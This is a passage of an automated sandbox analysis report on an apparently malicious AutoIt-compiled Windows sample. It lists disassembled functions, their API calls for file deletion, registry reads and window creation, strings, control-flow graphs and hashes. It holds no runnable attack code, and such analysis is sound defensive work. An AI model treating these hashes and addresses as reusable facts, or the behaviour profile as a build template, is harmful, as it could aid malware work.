                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                • GetCurrentProcess.KERNEL32(?,007FFAEC,00000000,00000000,?), ref: 00774BF8
                                                • IsWow64Process.KERNEL32(00000000), ref: 00774BFF
                                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00774C45
                                                • FreeLibrary.KERNEL32(00000000), ref: 00774C50
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00774C81
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00774C8D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                • String ID:
                                                • API String ID: 1986165174-0
                                                • Opcode ID: 746fd6b68c42a4f66b885bf0bb581d097cd2f64980362be5bcc3e98c51accef8
                                                • Instruction ID: 4d9f728f13dce0ad75931f54e3ecba398d66495cb4e91fec5266121ece145889
                                                • Opcode Fuzzy Hash: 746fd6b68c42a4f66b885bf0bb581d097cd2f64980362be5bcc3e98c51accef8
                                                • Instruction Fuzzy Hash: 7B91D67154A7C4DECB31CB6884511AAFFE5AF6A300B488A9DD0CF83A51D728ED08C729
                                                Function 007D449B Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,007AE6F1), ref: 007D44AB
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 007D44BC
                                                • FindClose.KERNEL32(00000000), ref: 007D44CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: fc37707d2e6f3b5d28b4091d5e26b86b617f74e429ebe42ace0b5d13939df50f
                                                • Instruction ID: 48251d1c03a3c0904f96d14c7ced3b986c3daed4be211a3708110ed008278c37
                                                • Opcode Fuzzy Hash: fc37707d2e6f3b5d28b4091d5e26b86b617f74e429ebe42ace0b5d13939df50f
                                                • Instruction Fuzzy Hash: 04E0DF328108006B8620A738EC4D8FE77ACAE05335F148726F935C22E0EF7C9990C69A
                                                Function 0077E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                Download Yara Rule
                                                Strings
                                                • Variable must be of type 'Object'., xrefs: 007B41BB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Variable must be of type 'Object'.
                                                • API String ID: 0-109567571
                                                • Opcode ID: dd56e2310d47cd5b40a2e82b3066449504a924ae9464d1b236a89a2f9b2307a7
                                                • Instruction ID: eb0c42840edda1748d6d17c273ca4312b2b7796ceb73d2cdba803d622073962f
                                                • Opcode Fuzzy Hash: dd56e2310d47cd5b40a2e82b3066449504a924ae9464d1b236a89a2f9b2307a7
                                                • Instruction Fuzzy Hash: 95A27B75A00205DBCF24CF58C484AAEB7B1FF58354F24C5A9E909AB352D739ED82CB91
                                                Function 00780B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00780BBB
                                                • timeGetTime.WINMM ref: 00780E76
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00780FB3
                                                • Sleep.KERNEL32(0000000A), ref: 00780FC1
                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 0078105A
                                                • DestroyWindow.USER32 ref: 00781066
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00781080
                                                • Sleep.KERNEL32(0000000A,?,?), ref: 007B51DC
                                                • TranslateMessage.USER32(?), ref: 007B5FB9
                                                • DispatchMessageW.USER32(?), ref: 007B5FC7
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007B5FDB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                • API String ID: 4212290369-3242690629
                                                • Opcode ID: 54e07355d5c8d15344f3135c53b9afac032e14ffc18e76548cb109a60937b715
                                                • Instruction ID: b7cbc74dea450437a6768842b320ab310c6acec4b2d0d824e234b2df02cd16af
                                                • Opcode Fuzzy Hash: 54e07355d5c8d15344f3135c53b9afac032e14ffc18e76548cb109a60937b715
                                                • Instruction Fuzzy Hash: ECB2D570608741DFDB24EF24C888BAAB7E5FF84304F14891DF59997291DB79E849CB82
                                                Function 007D91FE Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 007D9008: __time64.LIBCMT ref: 007D9012
                                                  • Part of subcall function 00775045: _fseek.LIBCMT ref: 0077505D
                                                • __wsplitpath.LIBCMT ref: 007D92DD
                                                  • Part of subcall function 0079426E: __wsplitpath_helper.LIBCMT ref: 007942AE
                                                • _wcscpy.LIBCMT ref: 007D92F0
                                                • _wcscat.LIBCMT ref: 007D9303
                                                • __wsplitpath.LIBCMT ref: 007D9328
                                                • _wcscat.LIBCMT ref: 007D933E
                                                • _wcscat.LIBCMT ref: 007D9351
                                                  • Part of subcall function 007D904E: _memmove.LIBCMT ref: 007D9087
                                                  • Part of subcall function 007D904E: _memmove.LIBCMT ref: 007D9096
                                                • _wcscmp.LIBCMT ref: 007D9298
                                                  • Part of subcall function 007D97DD: _wcscmp.LIBCMT ref: 007D98CD
                                                  • Part of subcall function 007D97DD: _wcscmp.LIBCMT ref: 007D98E0
                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007D94FB
                                                • _wcsncpy.LIBCMT ref: 007D956E
                                                • DeleteFileW.KERNEL32(?,?), ref: 007D95A4
                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007D95BA
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D95CB
                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D95DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 1500180987-0
                                                • Opcode ID: ddc7e22e020221ea7154ab0159c6ddbf02079d76273760d91e6064475f409292
                                                • Instruction ID: 312834c16dca9582c669ad6f5fdfe80599766399ccffa59f4a0fa5c37a60253c
                                                • Opcode Fuzzy Hash: ddc7e22e020221ea7154ab0159c6ddbf02079d76273760d91e6064475f409292
                                                • Instruction Fuzzy Hash: 6DC15BB1E00219AACF21DFA4DC85EDEB7BDEF44314F0040AAF609E6251DB789A45CF65
                                                Function 00773019 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00773074
                                                • RegisterClassExW.USER32(00000030), ref: 0077309E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007730AF
                                                • InitCommonControlsEx.COMCTL32(?), ref: 007730CC
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007730DC
                                                • LoadIconW.USER32(000000A9), ref: 007730F2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00773101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: 91ab69438cf109a77fb2ecd30c2024eeb2d446a76e245e086fdb3edc7774ee3e
                                                • Instruction ID: 927056ee50eb07d24e1b9892dd9008e3e86f6b5d91ba53a5d58d249b537365e3
                                                • Opcode Fuzzy Hash: 91ab69438cf109a77fb2ecd30c2024eeb2d446a76e245e086fdb3edc7774ee3e
                                                • Instruction Fuzzy Hash: B9313EB1901309AFDB00DFA4DC84ADEBBF4FF09310F14852AE590E62A0DBB94545CF94
                                                Function 00773041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00773074
                                                • RegisterClassExW.USER32(00000030), ref: 0077309E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007730AF
                                                • InitCommonControlsEx.COMCTL32(?), ref: 007730CC
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007730DC
                                                • LoadIconW.USER32(000000A9), ref: 007730F2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00773101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: c797db447e89c1068dd09b57bd333a54efa99f2eaecca23e98b121932d8b9d54
                                                • Instruction ID: 45fec844c0b6381af92b1a641fe799bc998144b0d841f203d4cc14bfe5f826d6
                                                • Opcode Fuzzy Hash: c797db447e89c1068dd09b57bd333a54efa99f2eaecca23e98b121932d8b9d54
                                                • Instruction Fuzzy Hash: 4021C9B1901618AFDB00DF94EC89B9EBBF4FB08710F00852AF610E62A0DBB54544CFA5
                                                Function 007771EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00774864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008352F8,?,007737C0,?), ref: 00774882
                                                  • Part of subcall function 0079068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007772C5), ref: 007906AD
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00777308
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007AEC21
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007AEC62
                                                • RegCloseKey.ADVAPI32(?), ref: 007AECA0
                                                • _wcscat.LIBCMT ref: 007AECF9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 2673923337-2727554177
                                                • Opcode ID: 5d42780ecbaf59bae2c71e0b6a58b7cd419316767a81cbc5fb17c85ad107d595
                                                • Instruction ID: ac4f23ec9e1121ba14a960b3912ed0e5da25f53dfb6acb28c372ff3ea108d823
                                                • Opcode Fuzzy Hash: 5d42780ecbaf59bae2c71e0b6a58b7cd419316767a81cbc5fb17c85ad107d595
                                                • Instruction Fuzzy Hash: F6716F71509301EEC714EF29E84589BBBE8FFC5350B41892EF449C32A1EB749958CB91
                                                Function 00773A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00773A62
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00773A71
                                                • LoadIconW.USER32(00000063), ref: 00773A88
                                                • LoadIconW.USER32(000000A4), ref: 00773A9A
                                                • LoadIconW.USER32(000000A2), ref: 00773AAC
                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00773AD2
                                                • RegisterClassExW.USER32(?), ref: 00773B28
                                                  • Part of subcall function 00773041: GetSysColorBrush.USER32(0000000F), ref: 00773074
                                                  • Part of subcall function 00773041: RegisterClassExW.USER32(00000030), ref: 0077309E
                                                  • Part of subcall function 00773041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007730AF
                                                  • Part of subcall function 00773041: InitCommonControlsEx.COMCTL32(?), ref: 007730CC
                                                  • Part of subcall function 00773041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007730DC
                                                  • Part of subcall function 00773041: LoadIconW.USER32(000000A9), ref: 007730F2
                                                  • Part of subcall function 00773041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00773101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: 482319c53eab3a817c8ac8a2ca36ffc7480928bb5e6e434d91f12451bfb1c8c3
                                                • Instruction ID: 8fa1538c59d6451e42060122ae3bdda6aba1fb41f7fb194c610faff8186b951c
                                                • Opcode Fuzzy Hash: 482319c53eab3a817c8ac8a2ca36ffc7480928bb5e6e434d91f12451bfb1c8c3
                                                • Instruction Fuzzy Hash: 20214B70D00308EFEB10EFA4EC49BAE7BB5FB48711F10452AF904A62A1D7B95650DF94
                                                Function 00773633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 769 773633-773681 771 773683-773686 769->771 772 7736e1-7736e3 769->772 774 7736e7 771->774 775 773688-77368f 771->775 772->771 773 7736e5 772->773 776 7736ca-7736d2 DefWindowProcW 773->776 777 7ad24c-7ad27a call 7811d0 call 7811f3 774->777 778 7736ed-7736f0 774->778 779 773695-77369a 775->779 780 77375d-773765 PostQuitMessage 775->780 786 7736d8-7736de 776->786 816 7ad27f-7ad286 777->816 781 773715-77373c SetTimer RegisterWindowMessageW 778->781 782 7736f2-7736f3 778->782 783 7ad2bf-7ad2d3 call 7d281f 779->783 784 7736a0-7736a2 779->784 787 773711-773713 780->787 781->787 790 77373e-773749 CreatePopupMenu 781->790 788 7ad1ef-7ad1f2 782->788 789 7736f9-77370c KillTimer call 7744cb call 773114 782->789 783->787 810 7ad2d9 783->810 791 773767-773776 call 774531 784->791 792 7736a8-7736ad 784->792 787->786 796 7ad228-7ad247 MoveWindow 788->796 797 7ad1f4-7ad1f6 788->797 789->787 790->787 791->787 799 7736b3-7736b8 792->799 800 7ad2a4-7ad2ab 792->800 796->787 804 7ad1f8-7ad1fb 797->804 805 7ad217-7ad223 SetFocus 797->805 808 7736be-7736c4 799->808 809 77374b-77375b call 7745df 799->809 800->776 807 7ad2b1-7ad2ba call 7c7f5e 800->807 804->808 812 7ad201-7ad212 call 7811d0 804->812 805->787 807->776 808->776 808->816 809->787 810->776 812->787 816->776 817 7ad28c-7ad29f call 7744cb call 7743db 816->817 817->776
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?), ref: 007736D2
                                                • KillTimer.USER32(?,00000001), ref: 007736FC
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0077371F
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077372A
                                                • CreatePopupMenu.USER32 ref: 0077373E
                                                • PostQuitMessage.USER32(00000000), ref: 0077375F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated
                                                • API String ID: 129472671-2362178303
                                                • Opcode ID: a465c143720e5b2cb277b6aca7c235d7263b98e02afd9d2206185c88bb41ea43
                                                • Instruction ID: 2ad25687a6741c55681710105e16a60f83faeaaf0dd859fba5de664415e5f9fe
                                                • Opcode Fuzzy Hash: a465c143720e5b2cb277b6aca7c235d7263b98e02afd9d2206185c88bb41ea43
                                                • Instruction Fuzzy Hash: 964107B1200605FBDF246B68DC8DB7A3755FB81380F508925FA0AC62A1DB6CDE14E7A5
                                                Function 00773778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                • API String ID: 1825951767-3513169116
                                                • Opcode ID: 97e300a3699dd6b687f8f3c2476c5bb0cd4cd4f9c44a3acb01c466a5b37c0ed6
                                                • Instruction ID: 6a2c9ca8e61c253242d4535e1027ff5d95628500cdaf1f27b4a3e55daa2f0651
                                                • Opcode Fuzzy Hash: 97e300a3699dd6b687f8f3c2476c5bb0cd4cd4f9c44a3acb01c466a5b37c0ed6
                                                • Instruction Fuzzy Hash: 32A18D7281021DDADF14EBA0CC89EEEB778BF54340F448529F51AB7191DF786A09CBA1
                                                Function 007739E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1021 7739e7-773a57 CreateWindowExW * 2 ShowWindow * 2
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00773A15
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00773A36
                                                • ShowWindow.USER32(00000000,?,?), ref: 00773A4A
                                                • ShowWindow.USER32(00000000,?,?), ref: 00773A53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: e9762b535a6bbe6b457f33e05f821cac442a354e67cb81149fd658ca4743125f
                                                • Instruction ID: 4324f99d0c2035b09db04019692850b7ae7b6f453c07f7457ea78803e6e9a8e7
                                                • Opcode Fuzzy Hash: e9762b535a6bbe6b457f33e05f821cac442a354e67cb81149fd658ca4743125f
                                                • Instruction Fuzzy Hash: CCF03A70500694BEEA3067276C08E3B2E7DEBC6F50B00442AFA00A2270CA651810CAB0
                                                Function 0077410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1022 77410d-774123 1023 774200-774204 1022->1023 1024 774129-77413e call 777b76 1022->1024 1027 774144-774164 call 777d2c 1024->1027 1028 7ad50d-7ad51c LoadStringW 1024->1028 1031 7ad527-7ad53f call 777c8e call 777143 1027->1031 1032 77416a-77416e 1027->1032 1028->1031 1041 77417e-7741fb call 792f60 call 77463e call 792f3c Shell_NotifyIconW call 775a64 1031->1041 1044 7ad545-7ad563 call 777e0b call 777143 call 777e0b 1031->1044 1034 774205-77420e call 7781a7 1032->1034 1035 774174-774179 call 777c8e 1032->1035 1034->1041 1035->1041 1041->1023 1044->1041
                                                APIs
                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007AD51C
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                • _memset.LIBCMT ref: 0077418D
                                                • _wcscpy.LIBCMT ref: 007741E1
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007741F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
